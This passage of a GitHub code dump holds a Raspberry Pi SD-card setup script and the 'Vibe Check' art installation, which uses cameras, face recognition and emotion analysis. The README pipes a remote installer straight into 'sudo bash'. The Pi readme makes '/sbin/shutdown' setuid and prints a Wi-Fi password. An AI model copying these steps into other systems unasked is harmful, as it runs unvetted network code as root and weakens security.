-f \"$1/SYSTEM\" ];then\n\tbecho \"ERROR: Path '$1' does not seem to be the system partition!\"\n\texit 1\nfi\n\nif [ -z ${ENABLE_COMPOSITE+x} ]; then\n if [ \"$#\" = \"3\" ]; then\n if [ \"$3\" = \"-c\" ];then\n becho \"Enabling composite for RPi.\"\n ENABLE_COMPOSITE=1\n elif [ \"$3\" = \"-w\" ];then\n becho \"Enabling 16:9 composite for RPi.\"\n ENABLE_COMPOSITE=2\n else\n becho \"Not enabling composite for RPi.\"\n ENABLE_COMPOSITE=0\n fi\n fi\nelse\n becho \"Using environment ENABLE_COMPOSITE = $ENABLE_COMPOSITE.\"\nfi\n\nif [ ! \"`whoami`\" = \"root\" ];then\n\tbecho \"You need to be root to use this tool.\"\n\t\n\tsudo_loc=`which sudo`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with sudo.\"\n\t\tsudo -E $0 $@\n\t\texit $?\n\tfi\n\t\n\tsu_loc=`which su`\n\tif [ \"$?\" = \"0\" ];then\n\t\tbecho \"Attempting to log into root with su.\"\n\t\tsu -p -c \"$0 $@\"\n\t\texit $?\n\tfi\n\t\n\tbecho \"ERROR: You must be root to use this tool!\"\n\texit 1\nfi\n\nbecho \"Step 1: Configuration archive\"\n\"$SCRIPT_DIR/install_config_archive.sh\" \"$2\"; cerr $?\n\nbecho \"Step 2: Patch system image\"\n\"$SCRIPT_DIR/install_patched_image.sh\" \"$1\"; cerr $?\n\nbecho \"Step 3: Install boot splash\"\n\"$SCRIPT_DIR/install_oemsplash.sh\" \"$1\"; cerr $?\n\nif [ \"$ENABLE_COMPOSITE\" = \"1\" ] || [ \"$ENABLE_COMPOSITE\" = \"2\" ]; then\n becho \"Step 4: Enable composite video output\"\n \"$SCRIPT_DIR/install_display_config_rpi1.sh\" \"$1\"; cerr $?\n \n if [ \"$ENABLE_COMPOSITE\" = \"2\" ]; then\n becho \"Step 5: Enable 16:9 aspect ratio for composite video output\"\n \"$SCRIPT_DIR/install_display_config_rpi1_ratio169.sh\" \"$1\"; cerr $?\n fi\nfi\n\nif [ -f \"$SCRIPT_DIR/post_install.sh\" ]; then\n \"$SCRIPT_DIR/post_install.sh\" \"$1\" \"$2\"; cerr $?\nfi\n\nbecho \"Unmounting system partition...\"\numount \"$1\"\n\nbecho \"Unmounting data partition...\"\numount \"$2\"\n\nbecho \"All done! You can safely remove your SD card and boot it!\"\n" }, { "alpha_fraction": 0.5671370029449463, "alphanum_fraction": 0.5867091417312622, "avg_line_length": 26.123456954956055, "blob_id": "d642c0cd5ffaa7ab92ed90126c5cb6de7c7e3a15", "content_id": "94d7aed545da90d76c6434e529998ba0f796cf6d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2197, "license_type": "permissive", "max_line_length": 127, "num_lines": 81, "path": "/post_install.sh", "repo_name": "UMDSpaceSystemsLab/DisplayBoards", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Custom commands for SSL DisplayBoard\n# -------------------------------------\n# You can put custom commands for your own local setup here!\n# \n# $1 will have the system partition directory, and $2 will have the\n# data partition directory.\n# \n# You can add your commands in the custom section below.\n# \n# If you need to request root (especially if you're writing into the\n# data partition), set the option accordingly within the config\n# section.\n\n## START: Config section\n\n# REQUIRE_ROOT - whether we need root to run this script or not.\n# If 1, elevate permissions. If not, don't do anything.\nREQUIRE_ROOT=1\n\n## END: Config section\n\n## START: Bootstrap section\n## DO NOT CHANGE ANYTHING IN THIS SECTION\nbecho() { echo -e \"\\033[1m ++ $@\\033[0m\"; }\nbbecho() { echo -e \"\\033[1m -> $@\\033[0m\"; }\ncerr() { if [ ! \"$1\" = \"0\" ];then becho \"Previous command exited with code $1. 
Check output for more details.\"; exit 1; fi; }\n\nSCRIPT_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [ \"$#\" != \"2\" ];then\n\tbecho \"ERROR: Incorrect number of arguments.\"\n\tbecho \"Usage: $0 [path-to-kodi-system-partition] [path-to-kodi-data-partition]\"\n\texit 1\nfi\n\nif [ ! -d \"$1\" ];then\n\tbecho \"ERROR: Path '$1' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -d \"$2\" ];then\n\tbecho \"ERROR: Path '$2' does not exist (or isn't a directory)!\"\n\texit 1\nfi\n\nif [ ! -f \"$1/SYSTEM\" ];then\n\tbecho \"ERROR: Path '$1' does not seem to be the system partition!\"\n\texit 1\nfi\n\nif [ \"$REQUIRE_ROOT\" = \"1\" ];then\n if [ ! \"`whoami`\" = \"root\" ];then\n becho \"You need to be root to use this tool.\"\n \n sudo_loc=`which sudo`\n if [ \"$?\" = \"0\" ];then\n becho \"Attempting to log into root with sudo.\"\n sudo -E $0 $@\n exit $?\n fi\n \n su_loc=`which su`\n if [ \"$?\" = \"0\" ];then\n becho \"Attempting to log into root with su.\"\n su -p -c \"$0 $@\"\n exit $?\n fi\n \n becho \"ERROR: You must be root to use this tool!\"\n exit 1\n fi\nfi\n\n## END: Bootstrap section\n\n## START: Custom section\n## Add your own scripts here!\n\n## END: Custom section\n## Add your own scripts here!\n" } ]
9
foocp/vibe-check
https://github.com/foocp/vibe-check
1954c84d8dd9aa69f36ef08c9dc5bdc150f87c54
23dfc875a58a5b450e32be99f837f5c7920ae9fe
0f603342a5406a0b23d2497fbd20921cf1b12f39
refs/heads/master
2023-05-08T17:42:25.765370
2021-05-26T19:58:49
2021-05-26T19:58:49
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7034883499145508, "alphanum_fraction": 0.7209302186965942, "avg_line_length": 27.83333396911621, "blob_id": "489ff9e74e2316955412d888a0e83157bd639c73", "content_id": "cd472e70b7c4dee83cd59634ce5b99a02475cdfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 172, "license_type": "no_license", "max_line_length": 68, "num_lines": 6, "path": "/automate/status", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfor service in face app cluster; do\n SYSTEMD_COLORS=1 systemctl status vibe-check-$service | head -n3\n journalctl -eu vibe-check-$service | tail -n3\ndone" }, { "alpha_fraction": 0.5161290168762207, "alphanum_fraction": 0.6129032373428345, "avg_line_length": 31, "blob_id": "3f9d0f9d610ad4d097eccb822d2da96442a37e69", "content_id": "cb0454a35cc57c230798bb8a86880fe132739176", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 31, "license_type": "no_license", "max_line_length": 31, "num_lines": 1, "path": "/rpi/camera/killall.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "pgrep -f $1 | xargs -n1 kill -9" }, { "alpha_fraction": 0.7204945683479309, "alphanum_fraction": 0.740726888179779, "avg_line_length": 28.340660095214844, "blob_id": "332da79625857343dea0ff726ea4f70bd62dfc8d", "content_id": "af9b27799476db3052e9688c408e299f714e65f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2669, "license_type": "no_license", "max_line_length": 263, "num_lines": 91, "path": "/rpi/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Raspberry Pi\n\n## Setup with a new computer\n\nIf you don't already have an ssh key, run `ssh-keygen`. Then run:\n\n``` \n./cameras list\n./cameras ssh-copy-id\n./cameras ping\n```\n\n## Raspberry Pi setup\n\n### SD card setup\n\n1. Download [RaspiOS Lite](https://downloads.raspberrypi.org/raspios_lite_armhf_latest) from [this page](https://www.raspberrypi.org/downloads/raspberry-pi-os/).\n2. Use [Balena Etcher](balena.io/etcher/) to burn the SD card\n3. After burning, remove and re-insert the SD card\n4. Run `touch /Volumes/boot/ssh` to enable ssh by default.\n5. Edit `/Volumes/boot/config.txt` to set `start_x=0`, `gpu_mem=300` and add `dtparam=i2c_vc=on`.\n6. Run `touch /Volumes/boot/wpa_supplicant.conf` to create the wifi settings configuration and paste the configuration below.\n7. Eject the SD card and put it in the pi.\n8. Boot the pi.\n\nOpen the wifi settings and paste:\n\n```\ncountry=US\nctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\nupdate_config=1\n\nnetwork={\n ssid=\"vibe-check\"\n psk=\"duchenne\"\n}\n```\n\n### Setting up the first Pi\n\nFirst update the firmware:\n\n```\nssh pi@<ip address>\nsudo apt update\nsudo apt full-upgrade -y\nsudo reboot now\n```\n\nThen install the dependencies:\n\n```\nssh pi@<ip address>\nsudo apt install -y wiringpi i2c-tools libopencv-dev\nsudo apt install -y python-opencv python-pip llvm iperf3\npip install llvmlite==0.31.0 numba==0.47.0 numpy requests v4l2\nsudo apt autoremove -y\nsudo apt clean\nsudo chmod u+s /sbin/shutdown\n```\n\nAnd enable the camera and I2C with `sudo raspi-config`:\n\n1. Select \"5 Interfacing Options\"\n2. Select \"P1 Camera\"\n3. Select \"Yes\"\n4. Select \"5 Interfacing Options\"\n5. Select \"P5 I2C\"\n6. Select \"Yes\"\n7. Right arrow key twice to select <Back>, enter\n8. 
Right arrow key twice to select <Finish>, enter\n\nDisable automatic checking for updates and automatic upgrades:\n\n```\nsudo systemctl stop apt-daily.timer\nsudo systemctl disable apt-daily.timer\nsudo systemctl disable apt-daily.service\nsudo systemctl stop apt-daily-upgrade.timer &&\\\nsudo systemctl disable apt-daily-upgrade.timer &&\\\nsudo systemctl disable apt-daily-upgrade.service &&\\\nsudo systemctl daemon-reload\n```\n\n### Setting up remaining Pis\n\nMake an image of the first pi using Disk Utility. Select \"compressed\" image type. Then use Etcher to create remaining cards.\n\nLoad each card into a pi and find the IP address. Then run `./cameras set-hostname <ip> <number>` for example `./cameras set-hostname 192.168.0.195 11`. Finally push the code to the pi with `IDS=<camera id> ./cameras update` for example `IDS=11 ./cameras update`.\n\nSome final scripts are needed to regulate the network connection, run `./cameras exec \"sudo bash camera/fix-wlan.sh\"`." }, { "alpha_fraction": 0.5749866366386414, "alphanum_fraction": 0.6336368322372437, "avg_line_length": 27.295454025268555, "blob_id": "17d74b0b4d622568ddce4135b847cbbd7c5ff620", "content_id": "ca936d34b9e1bafd06926e2e8bc6ab8e78511208", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3734, "license_type": "no_license", "max_line_length": 80, "num_lines": 132, "path": "/rpi/camera/stream.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\nimport datetime\nimport sys\n\ndef log(*args):\n print(str(datetime.datetime.now()), *args)\n sys.stdout.flush()\n\nlog('loading libraries')\n\nimport json\nfrom RawProcessor import RawProcessor\nimport cv2\nimport arducam_mipicamera as arducam\nimport v4l2\nimport numpy as np\nimport requests\nfrom requests.exceptions import ConnectionError\n\nprint('loading configuration')\n\n# default configuration\nmin_exposure = 1280\nmax_exposure = 128000\nconfig = {\n 'id': 0,\n 'exposure': 12800,\n 'focus': 100,\n 'curves': [\n # [[0, 16], [127, 110], [255, 255]], # daylight\n # [[0, 17], [127, 159], [255, 255]],\n # [[0, 17], [127, 107], [255, 255]]]\n\n # [[0,0], [127,103], [255,255]], # basic white balance\n # [[0,0], [127,130], [255,255]],\n # [[0,0], [127,58], [255,255]]]\n\n [[0, 17], [127,103], [255, 197]], # exhibition\n [[0, 17], [127,130], [255, 233]],\n [[0, 17], [127,58], [255, 99]]]\n}\n\n# custom configuration overrides defaults\nwith open('config.json') as f:\n config.update(json.load(f))\n\nhost = 'hek-dual-gpu.local'\n# host = 'iyoiyo-gpu.local'\nurl = 'http://' + host + ':5000/vibecheck/upload/' + str(config['id'])\njpeg_quality = 90\nwidth, height = 4656, 3496\n\n# swap curves to bgr\nprocessor = RawProcessor(width, height, config['curves'][::-1], 'bgr')\n\nlog('connecting to camera')\ncamera = arducam.mipi_camera()\ncamera.init_camera()\n\nlog('configuring camera')\ncamera.set_resolution(width, height)\ncamera.software_auto_exposure(enable=False)\ncamera.software_auto_white_balance(enable=False)\ncamera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\ncamera.set_control(v4l2.V4L2_CID_FOCUS_ABSOLUTE, config['focus'])\n\ndef pct_overexposed(img, pts=16):\n h,w = img.shape[:2]\n overexposed = 0\n for y in np.linspace(0, h, pts, endpoint=False, dtype=int):\n for x in np.linspace(0, w, pts, endpoint=False, dtype=int):\n if np.any(img[y,x] == 255):\n overexposed += 1\n return float(overexposed) / (pts ** 2)\n\ndef 
modify_exposure(multiplier):\n config['exposure'] *= multiplier\n config['exposure'] = np.clip(config['exposure'], min_exposure, max_exposure)\n config['exposure'] = int(config['exposure'])\n # if multiplier > 1:\n # print('increasing exposure to', config['exposure'])\n # else:\n # print('decreasing exposure to', config['exposure'])\n camera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\n\ndef capture_and_send():\n\n # uncomment to update in realtime\n\n # with open('config.json') as f:\n # config.update(json.load(f))\n # camera.set_control(v4l2.V4L2_CID_EXPOSURE, config['exposure'])\n # camera.set_control(v4l2.V4L2_CID_FOCUS_ABSOLUTE, config['focus'])\n\n # capture image\n frame = camera.capture(encoding='raw')\n\n # process image\n img = processor(frame.as_array)\n\n # get exposure advice and autoexpose\n overexposed = pct_overexposed(img)\n # print('overexposed', overexposed)\n if overexposed > 0.02:\n modify_exposure(0.99)\n if overexposed == 0:\n modify_exposure(1.01)\n\n # convert to jpeg\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), jpeg_quality]\n _, encimg = cv2.imencode('.jpg', img, encode_param)\n\n # upload to server\n data = encimg.tostring()\n headers = {'content-type': 'image/jpeg'}\n try:\n requests.post(url, data=data, headers=headers)\n mb = float(len(data)) / (1000 * 1000)\n log('sent', round(mb, 2), 'MB')\n except ConnectionError:\n log('connection error')\n\nlog('capturing')\nwhile True:\n try:\n capture_and_send()\n except KeyboardInterrupt:\n break\n\nlog('exiting')\ncamera.close_camera()" }, { "alpha_fraction": 0.5930232405662537, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 20.625, "blob_id": "041e890fd87bc947f2c796e618a321baf4648662", "content_id": "12e337dd40b7609d2e31aa7143d3cae9d3e01fdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 172, "license_type": "no_license", "max_line_length": 55, "num_lines": 8, "path": "/automate/screenshot.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "mkdir -p screenshot\ncd screenshot\n{\n DISPLAY=:0.0 scrot 0.jpg -t 50 &\n DISPLAY=:0.1 scrot 1.jpg -t 50 &\n}\nwait\nmontage -geometry +0+0 0-thumb.jpg 1-thumb.jpg both.jpg" }, { "alpha_fraction": 0.7634146213531494, "alphanum_fraction": 0.787804901599884, "avg_line_length": 40.099998474121094, "blob_id": "622f0aaddf40cf2db0f09e12fee0681ceba14def", "content_id": "76e0ae0bfab67bb41bb125decf80c8b82c411cb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 410, "license_type": "no_license", "max_line_length": 114, "num_lines": 10, "path": "/face/download-models.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "mkdir -p models\ncd models\n\nfor DLIB_FN in shape_predictor_5_face_landmarks dlib_face_recognition_resnet_model_v1 mmod_human_face_detector; do\n wget http://dlib.net/files/$DLIB_FN.dat.bz2\n bzip2 -d $DLIB_FN.dat.bz2\ndone\n\nwget https://storage.googleapis.com/vibe-check-installation/models/ferplus-mobilenetv2-0.830.onnx\nwget https://storage.googleapis.com/vibe-check-installation/models/ferplus_classes.txt" }, { "alpha_fraction": 0.7766714096069336, "alphanum_fraction": 0.7780938744544983, "avg_line_length": 19.114286422729492, "blob_id": "753c3919f813e326f95bef637205f40ffed1b585", "content_id": "5ef5dd01bddf7acedbfc05a5ce7f26eeeb3fe490", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 703, "license_type": "no_license", 
"max_line_length": 57, "num_lines": 35, "path": "/rpi/camera/setup.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# setup networking\n\n# cat >/etc/wpa_supplicant/wpa_supplicant.conf <<EOL\n# country=US\n# ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\n# update_config=1\n\n# network={\n# ssid=\"vibe-check\"\n# psk=\"duchenne\"\n# }\n# EOL\n\ncat >/lib/systemd/system/vibecheck.service <<EOL\n[Unit]\nDescription=Vibe Check Camera\nRequires=network-online.target\n\n[Service]\nWorkingDirectory=/home/pi/camera\nExecStart=/home/pi/camera/stream.py\nUser=pi\nStandardInput=null\nStandardOutput=append:/var/log/vibecheck.log\nStandardError=append:/var/log/vibecheck.err.log\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\nsystemctl daemon-reload\n\nsystemctl enable vibecheck.service\nsystemctl start vibecheck.service" }, { "alpha_fraction": 0.7268292903900146, "alphanum_fraction": 0.7268292903900146, "avg_line_length": 12.733333587646484, "blob_id": "1250e4a4a2d94fe73f1b69bca9ef057d0659cbdb", "content_id": "6804461facf9d3f8698995f11baafc8de0bc73d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 205, "license_type": "no_license", "max_line_length": 43, "num_lines": 15, "path": "/database/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Setup MongoDB\n\n## Install MongoDB\n\n```\nsudo apt update\nsudo apt install -y mongodb\nsudo systemctl status mongodb # show status\n```\n\n## Import Placeholder Data\n\n```\nmongorestore -d vibecheck vibecheck\n```" }, { "alpha_fraction": 0.7363542914390564, "alphanum_fraction": 0.7487126588821411, "avg_line_length": 34.30908966064453, "blob_id": "813e9e125c5872a620183e4e98ace51b007a4bca", "content_id": "ccb3e48d82f4c75684667b7cb2f99b06ec25b6ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3886, "license_type": "no_license", "max_line_length": 729, "num_lines": 110, "path": "/README.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Vibe Check (2020)\n### Lauren Lee McCarthy and Kyle McDonald\n\nAs tracking and surveillance solutions are proposed to guide us through the current crisis, we enact another control system through the passive observation of our neighbors. Are they a threat, or essential to retaining our feeling of humanness? We notice our heightened sense of interdependence. Vibe Check appropriates common surveillance tools including face recognition and expression analysis to catalog the emotional effect exhibition visitors have on one another. Some are identified as evoking expressions of happiness, disgust, sadness, surprise, or boredom. 
Upon entering the exhibition, visitors are playfully alerted to who these people are, and as they leave, they may find they’ve earned this distinction themselves.\n\nCommissioned by HeK and MU for the exhibition [Real Feelings](https://www.hek.ch/en/program/events-en/event/opening-real-feelings.html).\n\n## Preparation\n\n* Install Ubuntu 18.04\n* Install the ssh server `sudo apt install openssh-server`\n* Install curl and zerotier: `sudo apt install curl && curl -s https://install.zerotier.com | sudo bash`\n* Join the zerotier network `sudo zerotier-cli join <network id>`\n* Add the network to your local `~/.ssh/config` and run `ssh-copy-id`\n* Install the NVIDIA drivers (more info in `database/readme.md`)\n* Install [Miniconda](https://docs.conda.io/en/latest/miniconda.html) (not Anaconda)\n* Install git and checkout the repository `sudo apt install git && git clone https://github.com/lmccart/vibe-check.git`\n* Install Chrome\n\n## Setup\n\nFollow the `readme.md` in each folder:\n\n1. `database/`\n2. `app/`\n3. `face/`\n4. `automate/`\n\n## Additional configuration\n\nDisable all desktop notifications:\n\n```\ngsettings set org.gnome.desktop.notifications show-banners false\n```\n\n## Status check\n\n* CPU should be busy: run `htop` and look for CPU activity.\n* GPUs should be busy: run `nvidia-smi`\n* Services should be running: `cd automate && ./status`\n* Logs should be updating `journalctl -feu vibe-check-face`\n* Cameras should be sending data (active) `cd rpi && ./cameras status`\n\n## Start-up and shut-down\n\nInstall XBindKeys:\n\n```\nsudo apt-get install xbindkeys xbindkeys-config\nxbindkeys --defaults > /home/hek/.xbindkeysrc\nxbindkeys-config\n```\n\nAdd an action for `control+shift + q` pointing to:\n\n```\nbash /home/hek/Documents/vibe-check/automate/killall-chrome.sh\n```\n\nAnd for `control+shift + c` pointing to:\n\n```\nbash /home/hek/Documents/vibe-check/automate/open-chrome.sh\n```\n\nSet the machine to automatically reboot daily at 6am:\n\n```\nsudo crontab -e\n```\n\nAdd the following line:\n\n```\n0 6 * * * /sbin/shutdown -r +5\n```\n\nAnd then using \"Startup Application Preferences\", add the `open-chrome.sh` to run on startup.\n\n## Problems\n\n### \"System problem detected\"\n\nTo clear the crash cache run:\n\n`sudo rm /var/crash/*`\n\n### TeamViewer won't start\n\nUse x0vncserver. Run `x0vncserver -passwordfile ~/.vnc/passwd -display :0` remotely and `ssh -N -L 5901:localhost:5900 <hostname>` locally then Screen Share to `localhost:5901`.\n\n### Screens won't stay rotated\n\nTwo possibilities:\n\n1. The native Ubuntu monitor configuration in `~/.config/monitors.xml` is overriding the `/etc/X11/xorg.conf` generated by nvidia-settings. Go into the native Ubuntu \"Displays\" preferences panel and rotate the screens there.\n2. Make sure to run `nvidia-settings` from the command line using `sudo`. Otherwise the `xorg.conf` will not be saved correctly.\n\n### pip install hangs indefinitely on Ubuntu\n\nThis might be because pip is [waiting for the keyring to be unlocked](https://github.com/pypa/pip/issues/7883#issuecomment-643319919). Add this to `~/.profile`:\n\n```\nexport PYTHON_KEYRING_BACKEND=keyring.backends.null.Keyring\n```\n\n### The screens do not show images\n\nCheck the Chrome terminal with `ctrl-shift-J` (outside kiosk mode). 
Make sure there is a `data.json` and `images/` files.\n" }, { "alpha_fraction": 0.5490196347236633, "alphanum_fraction": 0.6601307392120361, "avg_line_length": 22.538461685180664, "blob_id": "873312c89ff07be2333610240456782c617dcfdb", "content_id": "7c6ea617083219a1605160a1084e045a90d91341", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 306, "license_type": "no_license", "max_line_length": 34, "num_lines": 13, "path": "/automate/open-chrome.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\ncd ~/Documents/vibe-check/automate\n\nkillall chrome\nDISPLAY=:0.0 ./multibrowse \\\n http://localhost:8080/2 \\\n http://localhost:8080/1 \\\n http://localhost:8080/0\nDISPLAY=:0.1 ./multibrowse \\\n http://localhost:8080/3 \\\n http://localhost:8080/5 \\\n http://localhost:8080/4\n" }, { "alpha_fraction": 0.4014423191547394, "alphanum_fraction": 0.5192307829856873, "avg_line_length": 23.5, "blob_id": "2a3f04256460741c2ace93fb689d1f99f6202734", "content_id": "a58f522da259818be70b504dd18e893a081f653b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 832, "license_type": "no_license", "max_line_length": 69, "num_lines": 34, "path": "/rpi/raw-to-jpg.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport numpy as np\nimport cv2\nfrom camera.RawProcessor import RawProcessor\n\nfor fn in sys.argv[1:]:\n base, ext = os.path.splitext(fn)\n\n if ext != '.raw':\n continue\n\n out_fn = base + '.jpg'\n\n # if os.path.exists(out_fn):\n # print('skipping', out_fn)\n # continue\n\n data = np.fromfile(fn, dtype=np.uint8)\n\n width, height = 4656, 3496\n curves = [\n [[0, 14], [127,75], [255, 156]],\n [[0, 14], [127,128], [255, 255]],\n [[0, 14], [127,86], [255, 170]]]\n # curves = [\n # [[0, 0], [128, 128], [255, 255]],\n # [[0, 0], [128, 128], [255, 255]],\n # [[0, 0], [128, 128], [255, 255]]]\n processor = RawProcessor(width, height, curves[::-1], mode='bgr')\n img = processor(data)\n\n print('saving', out_fn)\n cv2.imwrite(out_fn, img)" }, { "alpha_fraction": 0.5875421166419983, "alphanum_fraction": 0.5921717286109924, "avg_line_length": 32.47887420654297, "blob_id": "a4ac50d182c855de5afd92c5a48f3c58d4c95e3e", "content_id": "ee1920cead401dc179aae244de8f81d5efc9dc1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2376, "license_type": "no_license", "max_line_length": 101, "num_lines": 71, "path": "/face/AnalysisProcess.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import os\nimport datetime\nimport time\nimport pickle\n\nfrom FaceAnalyzer import FaceAnalyzer\nfrom pymongo import MongoClient\nfrom imutil import imwrite, imdecode\nfrom blocking import classify\n\nimage_dir = '../app/images'\nrequire_two_faces = True # when blocklist is ready\n# require_two_faces = False # when building blocklist\n\nclass AnalysisProcess():\n def __init__(self):\n self.mongo = MongoClient()\n self.analyzer = FaceAnalyzer()\n self.blocklist = {}\n if os.path.exists('blocklist.pkl'):\n with open('blocklist.pkl', 'rb') as f:\n self.blocklist = pickle.load(f)\n print('blocklist:', ' '.join(list(self.blocklist.keys())))\n\n def __call__(self, camera_id, data):\n gpu_id = os.environ['CUDA_VISIBLE_DEVICES']\n id_str = f'GPU {gpu_id} x camera {camera_id:<2}'\n\n millis = int(time.time() * 1000)\n now = datetime.datetime.now().isoformat()\n\n start_time = 
time.time()\n img = imdecode(data)\n decode_duration = time.time() - start_time\n\n start_time = time.time()\n raw_faces = self.analyzer(img)\n analysis_duration = time.time() - start_time\n\n print(id_str, f'{decode_duration:0.3f} {analysis_duration:0.3f}', len(raw_faces), flush=True)\n\n snapshot_fn = f'data/snapshot/{camera_id}.jpg'\n if not os.path.exists(snapshot_fn):\n os.makedirs(os.path.split(snapshot_fn)[0], exist_ok=True)\n with open(snapshot_fn, 'wb') as f:\n f.write(data)\n\n filtered_faces = []\n for face in raw_faces:\n if camera_id in self.blocklist and classify(face, self.blocklist[camera_id]):\n continue\n filtered_faces.append(face)\n\n if require_two_faces and len(filtered_faces) < 2:\n return\n\n print(id_str, 'using', len(filtered_faces), 'of', len(raw_faces), 'faces')\n\n fn = os.path.join(camera_id, str(millis) + '.jpg')\n os.makedirs(os.path.join(image_dir, camera_id), exist_ok=True)\n print(id_str, 'saving to', fn, flush=True)\n full_path = os.path.join(image_dir, fn)\n with open(full_path, 'wb') as f:\n f.write(data)\n\n record = {\n 'camera_id': camera_id,\n 'photo_path': fn,\n 'faces': filtered_faces\n }\n self.mongo.vibecheck.raw.insert_one(record)" }, { "alpha_fraction": 0.6311787366867065, "alphanum_fraction": 0.6349809765815735, "avg_line_length": 22.024999618530273, "blob_id": "251af073287f65a7145c64ea7c42a6b75d58448c", "content_id": "67d76b64a1ff63a1f0f16b70a5392b59348c9b24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1841, "license_type": "no_license", "max_line_length": 61, "num_lines": 80, "path": "/face/app.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from multiprocessing import Process\nfrom multiprocessing.managers import BaseManager\nfrom queue import Queue, Full\nimport time\nimport os\nimport sys\nimport traceback\n\nfrom flask import Flask, request, jsonify\nimport logging\n\nclass MyManager(BaseManager):\n pass\n\nclass Tracker():\n def __init__(self):\n self.running = True\n\n def is_running(self):\n return self.running\n\n def stop(self):\n self.running = False\n\nMyManager.register('Queue', Queue)\nMyManager.register('Tracker', Tracker)\n\nmanager = MyManager()\nmanager.start()\nqueue = manager.Queue(maxsize=16)\ntracker = manager.Tracker()\n\ndef run(gpu_id, queue, tracker):\n os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)\n from AnalysisProcess import AnalysisProcess\n analyzer = AnalysisProcess()\n while tracker.is_running():\n try:\n analyzer(*queue.get())\n except KeyboardInterrupt as e:\n print('GPU', gpu_id, 'clean exit')\n exit()\n except Exception as e:\n with open(f'gpu_{gpu_id}.err.log', 'w') as f:\n traceback.print_exc(file=f)\n print('GPU', gpu_id, 'exception', e)\n traceback.print_exc()\n print('')\n sys.stdout.flush()\n\nprocesses = []\n\ngpu_count = 2\nfor gpu_id in range(gpu_count):\n p = Process(target=run, args=[gpu_id, queue, tracker])\n p.start()\n processes.append(p)\n\napp = Flask(__name__)\nlog = logging.getLogger('werkzeug')\nlog.disabled = True\n\[email protected]('/vibecheck/upload/<camera_id>', methods=['POST'])\ndef upload(camera_id):\n try:\n data = request.get_data()\n queue.put_nowait((camera_id, data))\n except Full:\n pass\n return jsonify(success=True)\n\ntry:\n app.run(host='0.0.0.0', debug=True)\nexcept:\n pass\n\ntracker.stop()\nfor p in processes:\n p.join()\nmanager.shutdown()" }, { "alpha_fraction": 0.6378676295280457, "alphanum_fraction": 0.6525735259056091, "avg_line_length": 26.200000762939453, "blob_id": 
"fea706fc9d11691ab98078b84bef0e41e547333e", "content_id": "0cdcada18ba55581611f7be836fed1943cf34f28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 544, "license_type": "no_license", "max_line_length": 79, "num_lines": 20, "path": "/app/app.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, jsonify, send_from_directory\n\napp = Flask(__name__)\n\[email protected]('/images/<camera_id>/<image>')\ndef send_image(camera_id, image):\n try:\n return send_from_directory(f'images/{camera_id}', image)\n except:\n return send_from_directory(f'edited/{camera_id}', image)\n\[email protected]('/<id>')\ndef home_page(id):\n if id == 'all':\n return render_template('all.html')\n else:\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, port=8080)\n" }, { "alpha_fraction": 0.6241829991340637, "alphanum_fraction": 0.673202633857727, "avg_line_length": 37.3125, "blob_id": "17d27ba78f8b1b1941ab24135036c1d2fbfe2683", "content_id": "749851d093eb7bc52c67801c312eb1c97fbfd6da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 612, "license_type": "no_license", "max_line_length": 75, "num_lines": 16, "path": "/face/blocking.py", "repo_name": "foocp/vibe-check", 